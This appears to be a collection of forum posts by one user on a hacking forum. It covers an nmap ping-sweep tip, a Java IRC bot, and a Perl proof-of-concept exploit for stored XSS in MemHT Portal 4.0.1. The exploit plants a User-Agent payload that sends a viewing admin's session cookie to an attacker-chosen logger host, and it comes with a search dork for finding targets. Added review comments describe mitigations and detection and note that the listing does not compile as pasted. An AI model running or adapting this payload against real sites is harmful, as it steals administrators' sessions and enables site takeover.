


Messages - ZonTa

Tutorials / Re: [Tutorial] Portscanning Fun
« on: December 24, 2011, 03:25:00 PM »
You can write all the IPs to a list and then do

kulverstukas@kulverstukas-desktop:~$ nmap -sP -iL ~/ips.list

Starting Nmap 5.00 ( http://nmap.org ) at 2011-12-24 15:26 EET
Host bru01m01-in-f105.1e100.net (209.85.147.105) is up (0.067s latency).
Host ir1.fp.vip.mud.yahoo.com (209.191.122.70) is up (0.17s latency).
Host xvm-100-57.ghst.net (173.246.100.57) is up (0.14s latency).
Nmap done: 3 IP addresses (3 hosts up) scanned in 2.80 seconds

-sP states that it should do nothing but ping the hosts.
-iL states that it will scan all IPs in the given list, the ips.list file in my case.

Most new routers and cameras don't respond to ICMP.

Tutorials / Re: HTTP Splitting
« on: April 14, 2011, 03:45:40 AM »
So when we do the cache poisoning, does it work for all clients?

Tutorials / Re: Linux (Web)server security
« on: April 14, 2011, 03:30:40 AM »
It wasn't finished when you posted it on opensc a long time ago :\

I wrote this. I reported it to the vendor and he gave me a positive reply. hehe :)

http://www.exploit-db.com/exploits/15623/

#!/usr/bin/perl
# MemHT Portal 4.0.1 Persistent Cross Site Scripting Vulnerability [user agent]
# by ZonTa - zontahackers[at]gmail[dot]com
#
# After successful inject wait for the admin to view statistic page.
# Fix is available : http://www.memht.com/news_149_MemHT-Portal-4-0-2.html
# Dork : intext:"MemHT Portal is a free software released under the GNU/GPL License by Miltenovik Manojlo"
#
# Review notes (a defender's reading of this proof of concept):
#  - Vulnerability class: stored XSS. The portal records the User-Agent
#    request header and, per the header note above, renders it in an admin
#    statistics page without HTML-encoding it. The payload built below closes
#    the surrounding table cell and, on load, sends the viewing admin's
#    document.cookie to the $logger host.
#  - Server-side mitigation is output encoding of every logged header value
#    before it is written into HTML. A Content-Security-Policy that forbids
#    inline script and an HttpOnly session cookie would each have blunted this
#    particular payload (it relies on an inline ONLOAD handler and on
#    document.cookie being readable).
#  - Detection: markup such as "<BODY ONLOAD=" or the string "document.cookie"
#    inside User-Agent values in web-server or WAF logs.
#  - No `use strict; use warnings;`, so misspelled variables are not caught.

use Getopt::Std;              # loaded but never used; no getopts() call in this listing
use Digest::MD5('md5_hex');
use LWP::UserAgent;

# Positional arguments. The count is only validated later in Main::Exploit,
# after these values have already been interpolated into the strings below.
my ($host,$id,$username,$password,$logger) = @ARGV;
 
# Indirect object syntax; `LWP::UserAgent->new` is the conventional form.
my $http = new LWP::UserAgent;
# The stored-XSS payload sent as the User-Agent header (see review notes).
my $u_agent = "]\"</td></tr><BODY ONLOAD=document.location=\"http://$logger?cookie=\"+document.cookie+\"&redirect=http://$host\">";
# Login cookie as this script reproduces it: id '#' md5(user) '#' md5(pass).
# Carrying an unsalted MD5 of the password in a cookie is itself a weakness.
my $cookies = "login_user=$id#".md5_hex($username)."#".md5_hex($password);

Main::Exploit();

# Declared after the Main::Exploit() call above. That works because subs are
# installed at compile time, but it reads backwards.
package Main;

# Entry point: prints usage unless exactly five arguments were given,
# otherwise installs the crafted User-Agent and performs the login request
# that gets it recorded by the portal.
sub Exploit
{   
    if (@ARGV != 5) {
        Main::Usage();          # prints help; does not exit (the script ends anyway)
    }
    else {
        HTTP::UserAgent($u_agent);
        MemHT::Login();     
    }   
}   

# Prints the help text. Returns print's status instead of exiting, so the
# caller decides what happens next.
sub Usage {
 
return print <<EOF;
+-------------------------------------------------------------------+
| MemHT Portal 4.0.1 Persistent Cross Site Scripting Vulnerability  |
+-------------------------[user agent]------------------------------+

by ZonTa - zontahackers[at]gmail[dot]com
 
Usage: perl exploit.pl host/path userId user pass logger[OPTIONS]

host: target host and memht path
userId: user id
user: valid username
pass: valid password
logger: PHP loging file
 
Example:
perl exploit.pl localhost/memht 2 foo secret 192.168.1.5/logger.php

Download Logger.php -> http://pastebin.com/K6E9AWrC

EOF
}

# Portal-specific step: the authenticated request that triggers the logging.
package MemHT;
       
# Fetches the new-private-message page with the forged login cookie so the
# portal logs the request (and its User-Agent). "Success" is inferred solely
# from the absence of "access denied" in the body; transport errors are not
# checked separately, so a non-HTTP failure also lands in the else branch.
sub Login
{
    HTTP::Cookies($cookies);
    my $response = HTTP::GET($host.'/index.php?page=pvtmsg&op=newMessage');
     
    if ($response->content =~ /access denied/i) {
        print "Login Failed!\n";
exit;
}
else {
print "Logged In!\n";
print "XSS injected !";
       
    }
}

# Thin wrappers around the shared $http agent. Naming the package `HTTP` puts
# it in the same namespace LWP's own HTTP::* modules use; a project-specific
# name would avoid confusion.
package HTTP;

# Sets the User-Agent string on the shared agent; returns whatever the
# LWP setter returns.
sub UserAgent
{
    return $http->agent($_[0]);
}

# Installs a raw Cookie default header (the forged login cookie) rather than
# using a cookie jar, so it is sent verbatim with every request.
sub Cookies
{
    return $http->default_header('Cookie' => $_[0]);
}
 
# GET the given URL, prefixing "http://" when no http scheme is present.
# Only "http://" is recognised (case-insensitively), so an "https://" URL
# would get a second scheme prepended. Returns the HTTP::Response.
sub GET
{   
    if ($_[0] !~ m{^http://(.+?)$}i) {
        return $http->get('http://'.$_[0]);
    }   
    else {
        return $http->get($_[0]);
    }   
}
     
# POST to the given URL with no body, using the same scheme-prefixing rule
# as GET. Not called anywhere in this listing.
sub POST
{   
    if ($_[0] !~ m{^http://(.+?)$}i) {
        return $http->post('http://'.$_[0]);
    }   
    else {
        return $http->post($_[0]);
    }   
}
     
# Sets an arbitrary default header on the shared agent. Not called in this
# listing.
# NOTE(review): the closing brace of this sub is missing as pasted, so the
# file does not compile in this form.
sub http_header
{
    return $http->default_header($_[0]);


# Greetz to Sri Lankans 

Hardware / Re: Make your old flash drive bootable!
« on: November 27, 2010, 05:23:20 AM »
Do you have a solution for a computer that doesn't support USB boot? That computer has 2 USB ports but no USB boot option.

Scripting Languages / Java IRC Bot
« on: November 25, 2010, 06:51:24 PM »
I was going to make an AI bot, and ended up with this. lol :P

/**
 *
 * @author ZonTa
 */
import java.io.*;
import java.util.*;
import java.net.Socket;


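/**
 * Small IRC bot: connects to one server, joins one channel and answers a
 * fixed set of phrases from {@link #KnowledgeBase}. Connection details are
 * hard-coded in the constructor; the read loop runs on its own thread.
 *
 * Channel messages are written without the ':' that introduces an IRC
 * trailing parameter, which is presumably why the canned replies use tabs
 * instead of spaces between words.
 */
public class JBot implements Runnable {

    /** Random 0..99 suffix for the nick so two instances are unlikely to collide. */
    Random generator = new Random();
    int r = generator.nextInt(100);

    private String server;
    private int port;
    private String channel;
    private String nick, user, name, owner;

    // Connection settings as overloaded setter/getter pairs (same name, different arity).

    protected void server(String server) {
        this.server = server;
    }

    protected String server() {
        return this.server;
    }

    protected void port(int port) {
        this.port = port;
    }

    protected int port() {
        return this.port;
    }

    protected void channel(String channel) {
        this.channel = channel;
    }

    protected String channel() {
        return this.channel;
    }

    protected void nick(String nick) {
        this.nick = nick;
    }

    protected String nick() {
        return this.nick;
    }

    protected void user(String user) {
        this.user = user;
    }

    protected String user() {
        return this.user;
    }

    protected void name(String name) {
        this.name = name;
    }

    protected String name() {
        return this.name;
    }

    protected void owner(String owner) {
        this.owner = owner;
    }

    protected String owner() {
        return this.owner;
    }

    /** Set in start() once connected; cleared when the read loop ends. */
    private boolean isActive;

    protected void isActive(boolean bool) {
        this.isActive = bool;
    }

    protected boolean isActive() {
        return this.isActive;
    }

    /** Builds a bot with the hard-coded settings and connects it. */
    public static void main(String args[]) {
        System.out.println("Starting program.");
        try {
            new JBot().start();
        } catch (java.io.IOException e) {
            // Was an empty catch: a failed connect ended the program with no output.
            System.out.println("Could not connect: " + e.getMessage());
        }
    }

    /**
     * Credits to whoever wrote it.
     * The AI KnowledgeBase for the bot: {trigger phrase, reply}. The trigger
     * is compared case-insensitively against the whole message text.
     */
    static String[][] KnowledgeBase = {
        {"HELLO",
"Hello!."
},

        {"WHAT IS YOUR NAME",
"MY\tNAME\tIS\tJ-BOT."
},

{"HI",
"HI\tTHERE!",
},

{"HOW ARE YOU",
"I'M\tDOING\tFINE!"
},

{"WHO ARE YOU",
"I'M\tAN\tA.I\tPROGRAM."
},

{"ARE YOU INTELLIGENT",
"YES,OFCORSE."
},

{"ARE YOU REAL",
"DOES\tTHAT\tQUESTION\tREALLY\tMATERS\tTO\tYOU?"
}
    };

    /**
     * Returns the reply whose trigger equals {@code str} ignoring case, or ""
     * when no entry matches.
     */
    static String findMatch(String str) {
        for (String[] entry : KnowledgeBase) {
            if (entry[0].equalsIgnoreCase(str)) {
                return entry[1];
            }
        }
        return "";
    }

    /** Writes one raw protocol line and flushes it immediately. */
    protected void sayIt(String str) throws IOException {
        out.write(str);
        out.flush();
    }

    /**
     * Extracts the message text from a raw line by taking the third
     * colon-separated field (":nick!user@host PRIVMSG #chan :text" -> "text").
     * Returns "" for lines with fewer than two colons; text that itself
     * contains a colon is cut at that colon.
     */
    static String getMsg(String str) {
        String[] items = str.split(":");
        if (items.length > 2) {
            return items[2];
        }
        return "";
    }

    /** Sender nick of a raw line: the prefix before '!' with its leading ':' removed. */
    protected String getUser(String user) {
        String[] items = user.split("!");
        return items[0].replace(":", "");
    }

    protected JBot() {
        System.out.println("Initializing.");
        this.server("irc.evilzone.org");
        this.port(6667);
        this.nick("jBOT-" + r);
        this.user("jBOT");
        this.name("jBOT");
        this.channel("#evilzone");
        this.owner("Owner");   // placeholder nick; GiveOP is only honoured from this sender
    }

    private Socket socket;
    private BufferedReader in;
    private BufferedWriter out;

    /**
     * Opens the connection, registers the nick, starts the read thread and
     * joins the channel.
     *
     * @throws java.io.IOException if the socket cannot be opened or written
     */
    protected void start() throws java.io.IOException {
        this.socket = new Socket(this.server(), this.port());
        this.in = new BufferedReader(new InputStreamReader(socket.getInputStream()));
        this.out = new BufferedWriter(new OutputStreamWriter(socket.getOutputStream()));
        if (socket.isConnected()) {
            out.write("NICK " + this.nick() + "\r\n");
            out.write("USER " + this.user() + " \"\" \"\" :" + this.name() + "\r\n");

            this.isActive(true);
            System.out.println("Starting thread.");
            new Thread(this).start();
            // The trailing "456" is kept as in the original; its meaning is not documented here.
            out.write("JOIN " + this.channel() + " 456\r\n");
            out.flush();
        }
    }

    /**
     * Read loop: greets the channel, then handles lines until the server
     * closes the connection or an I/O error occurs, after which the bot is
     * marked inactive and the socket closed. (The original outer
     * while(isActive) loop re-entered readLine() on a closed stream forever.)
     */
    public void run() {
        try {
            out.write("PRIVMSG " + this.channel() + " Greetingz!\r\n");
            out.flush();
        } catch (IOException ex) {
            System.out.println("Greeting failed: " + ex.getMessage());
        }

        try {
            String buffer;
            while (this.isActive() && (buffer = in.readLine()) != null) {
                System.out.println(buffer);
                handleLine(buffer);
            }
        } catch (java.io.IOException e) {
            e.printStackTrace();   // println(e.getStackTrace()) only printed an array reference
        } finally {
            this.isActive(false);
            closeQuietly();
        }
    }

    /** Dispatches one received line to the keepalive and chat handlers, in the original order. */
    private void handleLine(String buffer) throws IOException {
        String sResponse = findMatch(getMsg(buffer));
        if (sResponse.length() != 0) {
            sayIt("PRIVMSG " + this.channel() + " " + sResponse + "\r\n");
        }

        if (buffer.startsWith("PING")) {
            sayIt("PONG " + buffer.substring(5) + "\r\n");
        }

        if (buffer.contains("GiveOP")) {
            handleGiveOp(buffer);
        }

        if (buffer.contains("kiss")) {
            sayIt("PRIVMSG " + this.channel() + " :* :* :* \r\n");
        }

        if (buffer.contains("thank") || buffer.contains("Thank")) {
            sayIt("PRIVMSG " + this.channel() + " You\tare\twelcome\t" + getUser(buffer) + "!\r\n");
        }

        if (buffer.contains("KICK " + this.channel() + " " + this.nick())) {
            sayIt("JOIN " + this.channel() + " 456 \r\n");
            sayIt("PRIVMSG " + this.channel() + " \u0002You\tcan't\tkick\tme! \r\n");
        }

        if (buffer.contains("JOIN :" + this.channel()) && !buffer.contains(this.nick())) {
            sayIt("PRIVMSG " + this.channel() + " Welcome\t" + getUser(buffer) + " \r\n");
        }
    }

    /**
     * Grants +o to the word after "GiveOP", or to the owner when no target is
     * given. Only lines from the configured owner are honoured: the original
     * handed operator status to anyone who typed GiveOP, an unauthenticated
     * privilege grant. A nick comparison is a weak identity check on IRC, but
     * it is the minimum that stops strangers from opping themselves.
     */
    private void handleGiveOp(String buffer) throws IOException {
        if (!getUser(buffer).equals(this.owner())) {
            return;
        }
        String usr[] = buffer.split(" ");
        // usr[4] is the word after "GiveOP", so five tokens are required; the
        // original tested `>= 4` and threw ArrayIndexOutOfBounds on exactly four.
        if (usr.length > 4) {
            sayIt("MODE " + this.channel() + " +o " + usr[4] + "\r\n");
        } else {
            sayIt("MODE " + this.channel() + " +o " + this.owner() + "\r\n");
        }
    }

    /** Closes the socket (and its streams), ignoring errors from a connection that is already gone. */
    private void closeQuietly() {
        if (socket == null) {
            return;
        }
        try {
            socket.close();
        } catch (IOException ignored) {
            // nothing left to do on a dead connection
        }
    }
}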


